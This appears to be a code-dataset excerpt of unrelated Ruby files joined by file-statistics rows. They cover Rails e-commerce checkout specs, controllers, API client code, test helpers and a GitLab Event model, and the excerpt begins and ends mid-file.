expect(assigns(:order).errors[:bill_address]).to be
end
end
context 'when input new bill address' do
before { put :update, state: :orderer, order: { bill_address_attributes: address_attributes } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :delivery)) }
it 'has assigned @order with bill address' do
expect(assigns(:order).bill_address).to be
expect(assigns(:order).bill_address.attributes).to include(address_attributes.stringify_keys)
end
end
end
describe "GET 'edit' with state 'delivery'" do
let(:order_attributes) { attributes_for(:order, :for_delivery) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :delivery }
its(:response) { is_expected.to render_template(:delivery) }
its(:response) { is_expected.not_to be_redirect }
end
describe "PUT 'update' with state 'delivery'" do
let(:order_attributes) { attributes_for(:order, :for_delivery) }
before { current_order.update_attributes(order_attributes) }
context 'when not exist ship address' do
before { put :update, state: :delivery }
its(:response) { is_expected.to render_template(:delivery) }
its(:response) { is_expected.not_to be_redirect }
it 'has assigned @order with errors' do
expect(assigns(:order).errors.any?).to be true
expect(assigns(:order).errors[:ship_address]).to be
end
end
context 'when input new shipping address' do
before { put :update, state: :delivery, order: { ship_address_attributes: address_attributes } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :shipment)) }
it 'has assigned @order with ship address' do
expect(assigns(:order).ship_address).to be
expect(assigns(:order).ship_address.attributes).to include(address_attributes.stringify_keys)
end
end
end
describe "GET 'edit' with state 'shipment'" do
let(:order_attributes) { attributes_for(:order, :for_shipment) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :shipment }
its(:response) { is_expected.to render_template(:shipment) }
its(:response) { is_expected.not_to be_redirect }
end
describe "PUT 'update' with state 'shipment'" do
let(:order_attributes) { attributes_for(:order, :for_shipment) }
before { current_order.update_attributes(order_attributes) }
before { put :update, state: :shipment, order: { shipments_attributes: { '0' => { shipment_method_id: shipment_method.id } } } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :payment)) }
it 'has assigned @order with shipemnt method' do
expect(assigns(:order).shipments.first.shipment_method).to eq(shipment_method)
end
end
describe "GET 'edit' with state 'payment'" do
let(:order_attributes) { attributes_for(:order, :for_payment) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :payment }
its(:response) { is_expected.to render_template(:payment) }
its(:response) { is_expected.not_to be_redirect }
end
describe "PUT 'update' with state 'payment'" do
let(:order_attributes) { attributes_for(:order, :for_payment, shipments: [shipment]) }
let(:shipment) { build(:shipment, shipment_method: shipment_method) }
before { current_order.update_attributes(order_attributes) }
before { put :update, state: :payment, order: { payment_attributes: { payment_method_id: payment_method.id } } }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :confirm)) }
it 'has assigned @order with payment method' do
expect(assigns(:order).payment.payment_method).to eq(payment_method)
end
end
describe "GET 'edit' with state 'confirm'" do
let(:order_attributes) { attributes_for(:order, :for_confirm) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :confirm }
its(:response) { is_expected.to render_template(:confirm) }
its(:response) { is_expected.not_to be_redirect }
end
describe "POST 'create'" do
let(:order_attributes) { attributes_for(:order, :for_confirm, shipments: [shipment]) }
let(:shipment) { build(:shipment, shipment_method: shipment_method, shipment_items: [shipment_item]) }
let(:shipment_item) { build(:shipment_item, stock: stock) }
before do
current_order.attributes = order_attributes
# Do not check out of stock.
current_order.save!(validate: false)
end
it "renders the 'create' template" do
post :create
expect(response).to render_template(:create)
end
it 'has flash messages' do
post :create
expect(flash[:notice]).to eq Comable.t('orders.success')
end
it 'has assigned completed @order' do
post :create
expect(assigns(:order).completed?).to be true
end
it 'has assigned completed @order with a item' do
post :create
expect(assigns(:order).order_items.count).to eq(1)
end
context 'when product is out of stock' do
let(:stock) { create(:stock, :unstocked) }
it 'redirects to the shopping cart' do
post :create
expect(response).to redirect_to(controller.comable.cart_path)
end
it 'has flash messages' do
post :create
expect(flash[:alert]).to eq(Comable.t('errors.messages.out_of_stocks'))
end
end
context 'when just became out of stock' do
before { stock.update_attributes(quantity: 0) }
it "redirects to 'confirm' page" do
post :create
expect(response).to redirect_to(controller.comable.next_order_path(state: :confirm))
end
it 'has flash messages' do
post :create
expect(flash[:alert]).to eq(assigns(:order).errors.full_messages.join)
end
end
end
context 'when checkout flow is incorrect' do
let(:order_attributes) { attributes_for(:order, :for_orderer) }
before { current_order.update_attributes(order_attributes) }
it "redirects the 'orderer' page" do
post :create
expect(response).to redirect_to(controller.comable.next_order_path(state: :orderer))
end
end
end
context 'when guest' do
it_behaves_like 'checkout' do
let(:user) { Comable::User.new.with_cookies(cookies) }
end
end
context 'when user is signed in' do
it_behaves_like 'checkout' do
let(:user) { create(:user) }
end
end
describe 'order mailer' do
let!(:store) { create(:store, :email_activate) }
let(:order_attributes) { attributes_for(:order, :for_confirm) }
let(:user) { Comable::User.new.with_cookies(cookies) }
before { controller.current_order.update_attributes(order_attributes) }
before { allow(controller).to receive(:current_comable_user).and_return(user) }
before { user.add_cart_item(product) }
it 'sent a mail' do
expect { post :create }.to change { ActionMailer::Base.deliveries.length }.by(1)
end
context 'when email is empty' do
let!(:store) { create(:store, :email_activate, email: nil) }
it 'not sent a mail' do
expect { post :create }.to change { ActionMailer::Base.deliveries.length }.by(0)
end
end
end
end
| 34.58147 | 134 | 0.66177 |
0830d38fc704c35a8ce8151f9cfe4eaab3d0bd20
| 1,241 |
class Gws::Presence::Group::UsersController < ApplicationController
include Gws::BaseFilter
include Gws::CrudFilter
include Gws::Presence::UserFilter
prepend_view_path "app/views/gws/presence/users"
private
def set_crumbs
set_group
@crumbs << [t("modules.gws/presence"), gws_presence_users_path]
@crumbs << [@group.trailing_name, gws_presence_group_users_path(group: @group.id)]
end
def set_group
@group = Gws::Group.find(params[:group])
raise "404" unless @group.name.start_with?(@cur_site.name)
@groups = @cur_site.root.to_a + @cur_site.root.descendants.to_a
@custom_groups = Gws::CustomGroup.site(@cur_site).in(member_ids: @cur_user.id)
end
def items
@items = @group.users.search(params[:s]).page(params[:page]).per(25)
end
public
def index
items
@table_url = table_gws_presence_group_users_path(site: @cur_site, group: @group)
@paginate_params = { controller: 'gws/presence/group/users', action: 'index' }
end
def table
items
render file: :table, layout: false
end
def portlet
items
@manageable_users, @group_users = @items.partition { |item| @editable_user_ids.include?(item.id) }
render file: :portlet, layout: false
end
end
| 26.404255 | 102 | 0.707494 |
f791b0ea530d7ff2854f66666bca41cc81fe8f18
| 302 |
module Testbot
# Don't forget to update readme and changelog
def self.version
version = "0.7.9"
dev_version_file = File.join(File.dirname(__FILE__), '..', '..', 'DEV_VERSION')
if File.exists?(dev_version_file)
version += File.read(dev_version_file)
end
version
end
end
| 23.230769 | 83 | 0.668874 |
b97bb89ad393020521ec9634b4c8c8eab2a208bf
| 3,048 |
require File.dirname(__FILE__) + '/../../spec_helper'
describe 'Spree::Calculator::AdvancedFlatPercent based on master_price' do
let(:calculator) { Spree::Calculator::AdvancedFlatPercent.new }
let(:order) { FactoryGirl.create(:order,
:line_items => [
FactoryGirl.build(:line_item, :price => 10, :quantity => 1),
FactoryGirl.build(:line_item, :price => 20, :quantity => 1)
]
)}
before do
allow(calculator).to receive(:preferred_flat_percent).and_return(10)
allow(calculator).to receive(:preferred_based_on_cost_price).and_return(false)
end
context "compute" do
it "should compute amount correctly" do
expect(calculator.compute(order)).to eq(-3.0)
end
it "should round result correctly" do
allow(order).to receive(:line_items).and_return([
FactoryGirl.create(:line_item, :price => 10.56, :quantity => 1),
FactoryGirl.create(:line_item, :price => 20.49, :quantity => 1)
])
expect(calculator.compute(order)).to eq(-3.11)
allow(order).to receive(:line_items).and_return([
FactoryGirl.create(:line_item, :price => 10.56, :quantity => 1),
FactoryGirl.create(:line_item, :price => 20.48, :quantity => 1)])
expect(calculator.compute(order)).to eq(-3.10)
end
end
end
describe 'Spree::Calculator::AdvancedFlatPercent based on cost_price' do
let(:calculator) { Spree::Calculator::AdvancedFlatPercent.new }
let(:variant1) { FactoryGirl.create(:variant, :cost_price => 3, :price => 5) }
let(:variant2) { FactoryGirl.create(:variant, :cost_price => 12, :price => 20) }
let(:order) { FactoryGirl.create(:order,
:line_items => [
FactoryGirl.create(:line_item, :price => 5, :quantity => 2, :variant => variant1),
FactoryGirl.create(:line_item, :price => 20, :quantity => 1, :variant => variant2)
]
)}
before do
allow(calculator).to receive(:preferred_flat_percent).and_return(15)
allow(calculator).to receive(:preferred_based_on_cost_price).and_return(true)
end
context "compute" do
it "should compute amount correctly" do
expect(calculator.compute(order)).to eq(BigDecimal.new("-9.30"))
end
it "should round result correctly" do
allow(variant1).to receive(:cost_price).and_return(2.7)
allow(variant2).to receive(:cost_price).and_return(12.35)
expect(calculator.compute(order)).to eq(BigDecimal.new("-9.59")) # -9.5875
allow(variant1).to receive(:cost_price).and_return(2.7)
allow(variant2).to receive(:cost_price).and_return(12.25)
expect(calculator.compute(order)).to eq(BigDecimal.new("-9.70")) # -9.7025
end
end
context "compute_item" do
it "should compute price correctly" do
expect(calculator.compute_item(variant1)).to eq(3*1.15)
allow(variant1).to receive(:cost_price).and_return(2.7)
expect(calculator.compute_item(variant1)).to eq(2.7*1.15)
allow(variant1).to receive(:cost_price).and_return(nil)
expect(calculator.compute_item(variant1)).to eq(5)
end
end
end
| 38.1 | 89 | 0.677165 |
6158f365dfc3ec933467138529d126f9c3ca45a6
| 187 |
FactoryGirl.define do
factory :user, class: Subscribem::User do
sequence(:email) {|n| "test#{n}@example.com"}
password "password"
password_confirmation "password"
end
end
| 23.375 | 49 | 0.700535 |
edb6ce27bb995cb1c39d087a71fdc549d57f80e6
| 1,376 |
require 'active_record'
require 'fileutils'
module Sinatodo
# データベースへの接続処理を扱うモジュール
# @author yasugahira0810
module DB
# データベースへの接続とテーブルの作成を行う
# @return [void]
def self.prepare
database_path = File.join(ENV['HOME'], '.sinatodo', 'sinatodo.db')
connect_database database_path
create_table_if_not_exists database_path
end
def self.connect_database(path)
spec = {adapter: 'sqlite3', database: path}
ActiveRecord::Base.establish_connection spec
end
def self.create_table_if_not_exists(path)
create_database_path path
connection = ActiveRecord::Base.connection
return if connection.table_exists?(:tasks)
# ここでnull: falseとか書いているけど、これだけだと実際は登録できてしまうので、
# Active Recordのvalidatesメソッドでバリデーションを行うことになる。(よくわかってない。)
connection.create_table :tasks do |t|
t.column :name, :string, null: false
t.column :content, :text, null: false
t.column :status, :integer, default: 0, null: false
t.timestamps null: false
end
connection.add_index :tasks, :status
connection.add_index :tasks, :created_at
end
def self.create_database_path(path)
FileUtils.mkdir_p File.dirname(path)
end
# 公開不要なメソッドの可視性をprivateにする
private_class_method :connect_database, :create_table_if_not_exists, :create_database_path
end
end
| 26.980392 | 94 | 0.704215 |
f7a9965c05288d96b10011350e2502c62479f3d5
| 1,085 |
# frozen_string_literal: true
require 'helper'
class TestFFaker < Test::Unit::TestCase
include DeterministicHelper
def test_version
assert FFaker::VERSION.is_a?(String)
end
def test_numerify
assert FFaker.numerify('###').match(/\d{3}/)
assert_deterministic { FFaker.numerify('###') }
end
def test_numerify_with_array
assert FFaker.numerify(['###', '###']).match(/\d{3}/)
assert_deterministic { FFaker.numerify(['###', '###']) }
end
def test_letterify
assert FFaker.letterify('???').match(/[a-z]{3}/)
assert_deterministic { FFaker.letterify('???') }
end
def test_letterify_with_array
assert FFaker.letterify(['???', '???']).match(/[a-z]{3}/)
assert_deterministic { FFaker.letterify(['???', '???']) }
end
def test_bothify
assert FFaker.bothify('???###').match(/[a-z]{3}\d{3}/)
assert_deterministic { FFaker.bothify('???###') }
end
def test_bothify_with_array
assert FFaker.bothify(['???###', '???###']).match(/[a-z]{3}\d{3}/)
assert_deterministic { FFaker.bothify(['???###', '???###']) }
end
end
| 25.833333 | 70 | 0.613825 |
e88641c085c60fce9ba3cb625e6e1a93eaad3196
| 397 |
class Admin::Mygengo::AccountController < MygengoController
before_filter :assets_global
def index
mygengo_requests do
@account = Mugen::Account.balance || {}
@stats = Mugen::Account.stats
end
@account.merge! @stats if @stats
end
private
def assets_global
include_stylesheet 'admin/extensions/mygengo/mugen'
end
end
| 22.055556 | 59 | 0.642317 |
38e684a3b3f833cd3e78519b519ba623d736a241
| 3,843 |
require 'test_helper'
module Radiator
class ApiTest < Radiator::Test
def setup
vcr_cassette('api_jsonrpc') do
@api = Radiator::Api.new(chain_options.merge(logger: LOGGER))
end
end
def test_hashie_logger
assert Radiator::Api.new(chain_options.merge(hashie_logger: 'hashie.log'))
end
def test_method_missing
assert_raises NoMethodError do
@api.bogus
end
end
def test_all_respond_to
vcr_cassette('api_all_respond_to') do
@api.method_names.each do |key|
assert @api.respond_to?(key), "expect rpc respond to #{key}"
end
end
end
def test_all_methods
vcr_cassette('api_all_methods') do
@api.method_names.each do |key|
begin
assert @api.send key
rescue Steem::ArgumentError
next
rescue Steem::RemoteNodeError
next
end
end
end
end
def test_get_accounts_no_argument
vcr_cassette('get_accounts_no_argument') do
assert_raises Steem::ArgumentError do
@api.get_accounts
end
end
end
def test_get_accounts
vcr_cassette('get_accounts') do
@api.get_accounts(['inertia']) do |accounts|
assert_equal Hashie::Array, accounts.class, accounts.inspect
account = accounts.first
owner_key_auths = account.owner.key_auths.first
assert_equal 'STM6qpwgqwzaF8E1GsKh28E8HVRzbBdewcimKzLmn1Rjgq7SQoNUa', owner_key_auths.first
end
end
end
def test_get_feed_history
vcr_cassette('get_feed_history') do
@api.get_feed_history() do |history|
assert_equal Hashie::Mash, history.class, history.inspect
end
end
end
def test_get_account_count
vcr_cassette('get_account_count') do
@api.get_account_count do |count|
skip "Fixnum is deprecated." if count.class.to_s == 'Fixnum'
assert_equal Integer, count.class, count.inspect
end
end
end
def test_get_account_references
vcr_cassette('get_account_references') do
begin
@api.get_account_references(["2.2.27007"]) do |_, error|
assert_equal Hashie::Mash, error.class, error.inspect
end
rescue Steem::UnknownError => e
raise e unless e.inspect.include? 'condenser_api::get_account_references --- Needs to be refactored for Steem'
assert true
end
end
end
def test_get_dynamic_global_properties
vcr_cassette('get_dynamic_global_properties') do
@api.get_dynamic_global_properties do |properties|
assert_equal Hashie::Mash, properties.class, properties.inspect
end
end
end
def test_get_hardfork_version
vcr_cassette('get_hardfork_version') do
@api.get_hardfork_version do |version|
assert_equal String, version.class, version.inspect
end
end
end
def test_get_vesting_delegations
vcr_cassette('get_vesting_delegations') do
@api.get_vesting_delegations('minnowbooster', -1000, 1000) do |delegation|
assert_equal Hashie::Array, delegation.class, delegation.inspect
end
end
end
def test_get_witness_by_account
vcr_cassette('get_witness_by_account') do
@api.get_witness_by_account('') do |witness|
assert_equal NilClass, witness.class, witness.inspect
end
end
end
def test_recover_transaction
vcr_cassette('recover_transaction') do
assert_nil @api.send(:recover_transaction, [], 1, Time.now.utc), 'expect nil response from recover_transaction'
end
end
def test_backoff
assert_equal 0, @api.send(:backoff)
end
end
end
| 28.257353 | 120 | 0.64637 |
6a6a4f882c7b9843139026aba6c0cd80894c5872
| 572 |
require 'rails_helper'
RSpec.describe "papers/edit", type: :view do
before(:each) do
@paper = assign(:paper, Paper.create!(
title: "MyString",
venue: "MyString",
year: 1
))
end
it "renders the edit paper form" do
render
assert_select "form[action=?][method=?]", paper_path(@paper), "post" do
assert_select "input[name=?]", "paper[title]"
assert_select "input[name=?]", "paper[venue]"
assert_select "input[name=?]", "paper[year]"
assert_select "input[name=?]", "paper[author_ids][]"
end
end
end
| 20.428571 | 75 | 0.61014 |
21db05c0a12e54ce79172ab2ac5496e02d4b33b7
| 1,223 |
class Libmpd < Formula
desc "Higher level access to MPD functions"
homepage "https://gmpc.wikia.com/wiki/Gnome_Music_Player_Client"
url "https://www.musicpd.org/download/libmpd/11.8.17/libmpd-11.8.17.tar.gz"
sha256 "fe20326b0d10641f71c4673fae637bf9222a96e1712f71f170fca2fc34bf7a83"
bottle do
cellar :any
rebuild 1
sha256 "704760154c39e2917a85dc30eae29de1f3f7f114ac037715911edf7dcfbb4844" => :mojave
sha256 "366b75cc5d921e946f5d987cb2627a9d66d04db36032ff98f5dd881ff0df754e" => :high_sierra
sha256 "e5affb45da15f4b7df327b993216d44f76f88da1e8c2f1051a8045c63a5a9d04" => :sierra
sha256 "d4b932dc975f7fe87d8e26ebe9080d3633c33a66438c29d0403160adb6c7ada5" => :el_capitan
sha256 "36471b19608eea97bc9916fdb65937fbb385ade1bf43aac4c01031d3c3c1192f" => :yosemite
sha256 "8e79457e677bf003a8e5374f1f7ccffba5ef237e577a0e0831ccb2036101b357" => :mavericks
sha256 "85c97dbfb2a3a419495e702df451b00bf84e355d69c2e8512a54014ff702f45c" => :mountain_lion
end
depends_on "pkg-config" => :build
depends_on "gettext"
depends_on "glib"
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 42.172414 | 95 | 0.780049 |
1cf9f4c3c354ed0a5043f79d0dedd2d27df44aaf
| 2,069 |
# frozen_string_literal: true
module RuboCop
module Cop
module Style
# Use a guard clause instead of wrapping the code inside a conditional
# expression
#
# @example
# # bad
# def test
# if something
# work
# end
# end
#
# # good
# def test
# return unless something
# work
# end
#
# # also good
# def test
# work if something
# end
#
# # bad
# if something
# raise 'exception'
# else
# ok
# end
#
# # good
# raise 'exception' if something
# ok
class GuardClause < Cop
include MinBodyLength
MSG = 'Use a guard clause instead of wrapping the code inside a ' \
'conditional expression.'
def on_def(node)
body = node.body
return unless body
if body.if_type?
check_ending_if(body)
elsif body.begin_type? && body.children.last.if_type?
check_ending_if(body.children.last)
end
end
alias on_defs on_def
def on_if(node)
return if accepted_form?(node) || !contains_guard_clause?(node)
add_offense(node, location: :keyword)
end
private
def check_ending_if(node)
return if accepted_form?(node, true) || !min_body_length?(node)
add_offense(node, location: :keyword)
end
def accepted_form?(node, ending = false)
accepted_if?(node, ending) || node.condition.multiline?
end
def accepted_if?(node, ending)
return true if node.modifier_form? || node.ternary?
if ending
node.else?
else
!node.else? || node.elsif?
end
end
def contains_guard_clause?(node)
node.if_branch&.guard_clause? ||
node.else_branch&.guard_clause?
end
end
end
end
end
| 22.247312 | 76 | 0.515225 |
873b03eef2d30d29a527c3f31528ab4dc27772c9
| 200 |
class AddAuthTokenToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :api_token, :string
add_column :users, :api_user, :boolean
add_index :users, :api_token
end
end
| 22.222222 | 56 | 0.725 |
e8ef0f5f98a3efba3370302471def629f1f5be20
| 1,912 |
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.cache_classes = false
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure public file server for tests with Cache-Control for performance.
config.public_file_server.enabled = true
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{1.hour.to_i}"
}
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.cache_store = :null_store
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Store uploaded files on the local file system in a temporary directory.
config.active_storage.service = :test
config.action_mailer.perform_caching = false
# Tell Action Mailer not to deliver usernames to the real world.
# The :test delivery method accumulates sent usernames in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
end
| 39.020408 | 85 | 0.774059 |
ed8156358137d934d724b23c36da94f7ba57c716
| 149 |
require 'test/unit'
class CanHasAssetsTest < Test::Unit::TestCase
# Replace this with your real tests.
def test_this_plugin
flunk
end
end
| 16.555556 | 45 | 0.738255 |
e936872a416ab54a42c8f4237d55d6e252178f66
| 2,500 |
# frozen_string_literal: true
require 'faraday'
require 'faraday_middleware'
module TimeTree
# Command for HTTP request.
class HttpCommand
def initialize(host, client)
@host = host
@client = client
@logger = TimeTree.configuration.logger
end
# @param path [String] String or URI to access.
# @param params [Hash] Hash of URI query unencoded key/value pairs.
def get(path, params = {})
@logger.info "GET #{connection.build_url("#{@host}#{path}", params)}"
res = connection.get path, params
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
# @param path [String] String or URI to access.
# @param body_params [Hash]
# The request bodythat will eventually be converted to JSON.
def post(path, body_params = {}, &block)
@logger.debug "POST #{@host}#{path} body:#{body_params}"
headers = {'Content-Type' => 'application/json'}
res = connection.run_request :post, path, body_params.to_json, headers, &block
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
# @param path [String] String or URI to access.
# @param body_params [Hash]
# The request bodythat will eventually be converted to JSON.
def put(path, body_params = {})
@logger.debug "PUT #{@host}#{path} body:#{body_params}"
headers = {'Content-Type' => 'application/json'}
res = connection.run_request :put, path, body_params.to_json, headers
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
# @param path [String] String or URI to access.
# @param params [Hash] Hash of URI query unencoded key/value pairs.
def delete(path, params = {})
@logger.debug "DELETE #{@host}#{path} params:#{params}"
res = connection.delete path, params
@client.update_ratelimit(res)
@logger.debug "Response status:#{res.status}, body:#{res.body}"
res
end
private
def connection
Faraday.new(
url: @host,
headers: base_request_headers
) do |builder|
builder.response :json, parser_options: {symbolize_names: true}, content_type: /\bjson$/
end
end
def base_request_headers
{
'Accept' => 'application/vnd.timetree.v1+json',
'Authorization' => "Bearer #{@client.token}"
}
end
end
end
| 32.051282 | 96 | 0.6392 |
1da49573d18d03d700ade052eb42c59169b9bd30
| 227 |
class IncreaseLengthOfEntouragesUuidV2 < ActiveRecord::Migration[4.2]
def up
change_column :entourages, :uuid_v2, :string, limit: 71
end
def down
change_column :entourages, :uuid_v2, :string, limit: 12
end
end
| 22.7 | 69 | 0.735683 |
ace90161c34b70d557d41feb19c364b6419dffa7
| 642 |
class AnnouncementsController < ApplicationController
before_filter :authenticate_user!
def index
@announcements = current_user.announcements
#@announcements = Announcement.all
end
def new
@announcement = Announcement.new
end
def create
@announcement = Announcement.new(announcement_params)
@announcement.user_id = current_user.id
if @announcement.save
Notification.announcement(@announcement).deliver!
redirect_to announcements_path,notice: "successfully announced"
else
render action: "new"
end
end
private
def announcement_params
params[:announcement].permit(:title,:body,:user_id)
end
end
| 18.882353 | 66 | 0.774143 |
1cd180b4755441d85c30e7409215551ebf8fce4f
| 2,838 |
require 'spec_helper'
require 'ostruct'
describe Aef::Hosts::Helpers do
include Aef::Hosts::Helpers
let(:model) {
model = OpenStruct.new(
:name => 'test',
:cache_filled => true,
:elements => ['fnord', 'eris']
)
def model.cache_filled?
cache_filled
end
model
}
context "#validate_options" do
it "should accept options with a subset of valid option keys" do
options = {:valid1 => 123, :valid2 => 456}
expect {
validate_options(options, :valid1, :valid2, :valid3)
}.not_to raise_error
end
it "should accept options with exactly the valid option keys" do
options = {:valid1 => 123, :valid2 => 456, :valid3 => 789}
expect {
validate_options(options, :valid1, :valid2, :valid3)
}.not_to raise_error
end
it "should deny options with invalid option keys" do
options = {:valid1 => 123, :invalid => 'test'}
expect {
validate_options(options, :valid1, :valid2, :valid3)
}.to raise_error(ArgumentError, 'Invalid option keys: :invalid')
end
end
context "#to_pathname" do
it "should return nil when nil is given" do
to_pathname(nil).should be_nil
end
it "should return a Pathname when a String is given" do
to_pathname('abc/def').should eql Pathname.new('abc/def')
end
it "should return a Pathname when a Pathname is given" do
to_pathname(Pathname.new('abc/def')).should eql Pathname.new('abc/def')
end
end
context "generate_inspect" do
it "should be able to render a minimal inspect output" do
generate_inspect(model).should eql %{#<OpenStruct>}
end
it "should be able to render a normal attribute in inspect output" do
generate_inspect(model, :name).should eql %{#<OpenStruct: name="test">}
end
it "should be able to render an attribute by custom String in inspect output" do
generate_inspect(model, 'abc=123').should eql %{#<OpenStruct: abc=123>}
end
it "should be able to render a special cache attribute in inspect output" do
generate_inspect(model, :cache).should eql %{#<OpenStruct: cached!>}
end
it "should not render a special cache attribute in inspect output if cache is not filled" do
model.cache_filled = false
generate_inspect(model, :cache).should eql %{#<OpenStruct>}
end
it "should be able to render elements in inspect output" do
generate_inspect(model, :elements).should eql <<-STRING.chomp
#<OpenStruct: elements=[
"fnord",
"eris"
]>
STRING
end
end
context "generate_elements_partial" do
it "should be able to render elements in inspect output" do
generate_elements_partial(['fnord', 'eris']).should eql <<-STRING.chomp
elements=[
"fnord",
"eris"
]
STRING
end
end
end
| 27.288462 | 96 | 0.654686 |
1ab8a1a7f4d6ccf046b6c79bc440139148765fa4
| 156 |
class Interfaces::FromReturnInteractor < IIInteractor::Base
context_in :in
context_out :out, from_return: true
def call
'return value'
end
end
| 17.333333 | 59 | 0.74359 |
6a35bca72c53860155dd19720dc6a3a19646b7e3
| 9,432 |
# frozen_string_literal: true
class Event < ActiveRecord::Base
include Sortable
include IgnorableColumn
include FromUnion
default_scope { reorder(nil) }
CREATED = 1
UPDATED = 2
CLOSED = 3
REOPENED = 4
PUSHED = 5
COMMENTED = 6
MERGED = 7
JOINED = 8 # User joined project
LEFT = 9 # User left project
DESTROYED = 10
EXPIRED = 11 # User left project due to expiry
ACTIONS = HashWithIndifferentAccess.new(
created: CREATED,
updated: UPDATED,
closed: CLOSED,
reopened: REOPENED,
pushed: PUSHED,
commented: COMMENTED,
merged: MERGED,
joined: JOINED,
left: LEFT,
destroyed: DESTROYED,
expired: EXPIRED
).freeze
TARGET_TYPES = HashWithIndifferentAccess.new(
issue: Issue,
milestone: Milestone,
merge_request: MergeRequest,
note: Note,
project: Project,
snippet: Snippet,
user: User
).freeze
RESET_PROJECT_ACTIVITY_INTERVAL = 1.hour
REPOSITORY_UPDATED_AT_INTERVAL = 5.minutes
delegate :name, :email, :public_email, :username, to: :author, prefix: true, allow_nil: true
delegate :title, to: :issue, prefix: true, allow_nil: true
delegate :title, to: :merge_request, prefix: true, allow_nil: true
delegate :title, to: :note, prefix: true, allow_nil: true
belongs_to :author, class_name: "User"
belongs_to :project
belongs_to :target, -> {
# If the association for "target" defines an "author" association we want to
# eager-load this so Banzai & friends don't end up performing N+1 queries to
# get the authors of notes, issues, etc. (likewise for "noteable").
incs = %i(author noteable).select do |a|
reflections['events'].active_record.reflect_on_association(a)
end
incs.reduce(self) { |obj, a| obj.includes(a) }
}, polymorphic: true # rubocop:disable Cop/PolymorphicAssociations
has_one :push_event_payload
# Callbacks
after_create :reset_project_activity
after_create :set_last_repository_updated_at, if: :push?
after_create :track_user_interacted_projects
# Scopes
scope :recent, -> { reorder(id: :desc) }
scope :code_push, -> { where(action: PUSHED) }
scope :in_projects, -> (projects) do
sub_query = projects
.except(:order)
.select(1)
.where('projects.id = events.project_id')
where('EXISTS (?)', sub_query).recent
end
scope :with_associations, -> do
# We're using preload for "push_event_payload" as otherwise the association
# is not always available (depending on the query being built).
includes(:author, :project, project: [:project_feature, :import_data, :namespace])
.preload(:target, :push_event_payload)
end
scope :for_milestone_id, ->(milestone_id) { where(target_type: "Milestone", target_id: milestone_id) }
# Authors are required as they're used to display who pushed data.
#
# We're just validating the presence of the ID here as foreign key constraints
# should ensure the ID points to a valid user.
validates :author_id, presence: true
self.inheritance_column = 'action'
class << self
def model_name
ActiveModel::Name.new(self, nil, 'event')
end
def find_sti_class(action)
if action.to_i == PUSHED
PushEvent
else
Event
end
end
# Update Gitlab::ContributionsCalendar#activity_dates if this changes
def contributions
where("action = ? OR (target_type IN (?) AND action IN (?)) OR (target_type = ? AND action = ?)",
Event::PUSHED,
%w(MergeRequest Issue), [Event::CREATED, Event::CLOSED, Event::MERGED],
"Note", Event::COMMENTED)
end
def limit_recent(limit = 20, offset = nil)
recent.limit(limit).offset(offset)
end
def actions
ACTIONS.keys
end
def target_types
TARGET_TYPES.keys
end
end
# rubocop:disable Metrics/CyclomaticComplexity
# rubocop:disable Metrics/PerceivedComplexity
def visible_to_user?(user = nil)
if push? || commit_note?
Ability.allowed?(user, :download_code, project)
elsif membership_changed?
Ability.allowed?(user, :read_project, project)
elsif created_project?
Ability.allowed?(user, :read_project, project)
elsif issue? || issue_note?
Ability.allowed?(user, :read_issue, note? ? note_target : target)
elsif merge_request? || merge_request_note?
Ability.allowed?(user, :read_merge_request, note? ? note_target : target)
elsif personal_snippet_note?
Ability.allowed?(user, :read_personal_snippet, note_target)
elsif project_snippet_note?
Ability.allowed?(user, :read_project_snippet, note_target)
elsif milestone?
Ability.allowed?(user, :read_milestone, project)
else
false # No other event types are visible
end
end
# rubocop:enable Metrics/PerceivedComplexity
# rubocop:enable Metrics/CyclomaticComplexity
def project_name
if project
project.full_name
else
"(deleted project)"
end
end
def target_title
target.try(:title)
end
def created?
action == CREATED
end
def push?
false
end
def merged?
action == MERGED
end
def closed?
action == CLOSED
end
def reopened?
action == REOPENED
end
def joined?
action == JOINED
end
def left?
action == LEFT
end
def expired?
action == EXPIRED
end
def destroyed?
action == DESTROYED
end
def commented?
action == COMMENTED
end
def membership_changed?
joined? || left? || expired?
end
def created_project?
created? && !target && target_type.nil?
end
def created_target?
created? && target
end
def milestone?
target_type == "Milestone"
end
def note?
target.is_a?(Note)
end
def issue?
target_type == "Issue"
end
def merge_request?
target_type == "MergeRequest"
end
def milestone
target if milestone?
end
def issue
target if issue?
end
def merge_request
target if merge_request?
end
def note
target if note?
end
def action_name
if push?
push_action_name
elsif closed?
"closed"
elsif merged?
"accepted"
elsif joined?
'joined'
elsif left?
'left'
elsif expired?
'removed due to membership expiration from'
elsif destroyed?
'destroyed'
elsif commented?
"commented on"
elsif created_project?
created_project_action_name
else
"opened"
end
end
def target_iid
